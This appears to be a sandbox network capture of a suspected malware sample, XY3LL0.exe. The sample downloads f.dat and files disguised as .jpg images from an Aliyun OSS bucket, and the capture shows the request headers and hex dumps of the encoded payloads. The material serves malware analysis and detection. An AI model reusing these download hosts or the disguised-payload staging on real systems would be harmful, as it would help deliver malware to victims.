2025-01-11 03:44:22 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:44:22 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:44:22 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 6781E91609E5983337892D37 Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 5
2025-01-11 03:44:22 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49983	118.178.60.9	443	4456	C:\Users\user\Documents\XY3LL0.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:44:23 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:44:24 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:44:24 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 6781E91853BCC63136358C9E Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 4
2025-01-11 03:44:24 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-11 03:44:24 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49984	118.178.60.9	443	4456	C:\Users\user\Documents\XY3LL0.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:44:25 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:44:26 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:44:25 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 6781E919DC44E039366DD0EC Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 2
2025-01-11 03:44:26 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 9c Data Ascii: ;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 f3 Data Ascii: xd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c a4 Data Ascii: ^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 d5 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 28 Data Ascii: M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|(
2025-01-11 03:44:26 UTC	4096	IN	Data Raw: 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 ab Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
